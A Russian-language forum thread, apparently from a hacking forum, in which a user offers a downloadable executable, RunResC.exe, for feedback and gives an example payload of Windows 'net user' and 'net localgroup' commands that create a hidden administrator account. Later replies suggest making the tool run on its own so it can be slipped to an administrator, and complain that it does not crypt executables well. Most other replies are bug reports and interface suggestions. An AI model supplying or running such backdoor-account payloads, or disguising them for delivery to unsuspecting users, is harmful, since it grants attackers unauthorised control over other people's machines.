Вот стряпал програмку. Посмотрите. Оцените. Напишите если понравилось. И что не понарвилось. Интерфейс - понятный. Язык - Украинский. Програмка тут : http://brun.if.ua/download/RunResC.exe
Пользоватся так например : Code: net user /add test qwe net localgroup administrators /add test net localgroup users /del test Болбше писать не буду. Додумывайтесь сами!
Пожелание пока одно =) Сделай чтоб она работала =) =) Или напиши подробное описание к проге. А то я пока кроме ошибок ничего не видел ... да и то, нет описания ошибки, т.е непонятно что не так ? Выскакивает какой-то "пустой" MessageBox с флагом MB_ICONERROR ... А так вообще =) Интрефейс для начала сделай на русском =), и верни кнопку "Minimize" =) И ... не обязательно канечно, но ... сделай защиту от повторного запуска, а лучше добавь возможность работы с несколькими "проектами", т.е ГРУБО говоря кинь на форму TPageControl, добавь одну кнопку с Caption'ом к примеру "Новый проект", по нажатию на эту кнопку будет создаваться новая закладка, и накаждой закладке то, что у тебя на всей форме ... я надеюсь ты мысль уловил =) По повду двойного клика, это канечно не плохо, но ИМХО лучше придерживаться стандартов, т.е ограничиться кнопочкой "обзор".
чувак, она будет работать с правами админа. я такую уже делал. или сделай емё автономной, то сть запустил - создал админа. типа подбросить админу.
Да да мы все поянлиЮ что вы знаете украинский! А кто-то знает китайский, пускай он все на нем и пишет... Не форум - а бред! Сабж... Програмка нормальная, тока почему то много ашипок! ))))
Brun Всё бы хорошо, вот только она НЕ ПАШЕТ! В чём проблема?? я уже всё перепробывал... Она вообще у когото работает??
Не раотает прога, возможно из-за того, что она заточена под бат и тхт. Ехешники не криптует, как надо ....
а как надо? ехе'шник создаёт?... А если прога не исполняет то что ты хочеш, то может проблема в неправильном написании батника.